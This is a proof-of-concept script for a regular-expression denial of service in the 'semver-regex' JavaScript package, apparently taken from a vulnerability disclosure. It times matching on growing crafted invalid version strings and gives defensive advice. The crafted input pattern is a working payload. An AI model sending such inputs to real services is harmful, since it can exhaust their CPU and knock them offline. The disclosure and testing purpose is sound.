It allows an attacker to cause a denial of service when formatting crafted invalid semver versions.
// PoC.mjs
import semverRegex from 'semver-regex';
// Timing harness for the semver-regex denial of service described above.
// Each round builds a longer invalid version string, runs it through
// semverRegex().test(), and prints the input length with the elapsed
// wall-clock time. Only the timing is reported; the match result is discarded.
// Elapsed time that grows much faster than the input length points to
// super-linear regex backtracking. For anyone matching untrusted version
// strings, the defensive takeaway is to bound input length before matching
// and to run a release of the library that contains the fix.
for (let round = 1; round <= 50000; round++) {
  const startedAt = Date.now();

  // Valid-looking prefix, `round` copies of '.-------', then a trailing '@'
  // so that the string as a whole is not a valid semver version.
  const input = '0.0.0-0' + '.-------'.repeat(round) + '@';

  // A fresh regex is created on every round, as in the original listing.
  semverRegex().test(input);

  // Date.now() has millisecond resolution, so short inputs may report 0 ms.
  const elapsedMs = Date.now() - startedAt;
  console.log(`attack_str.length: ${input.length}: ${elapsedMs} ms`);
}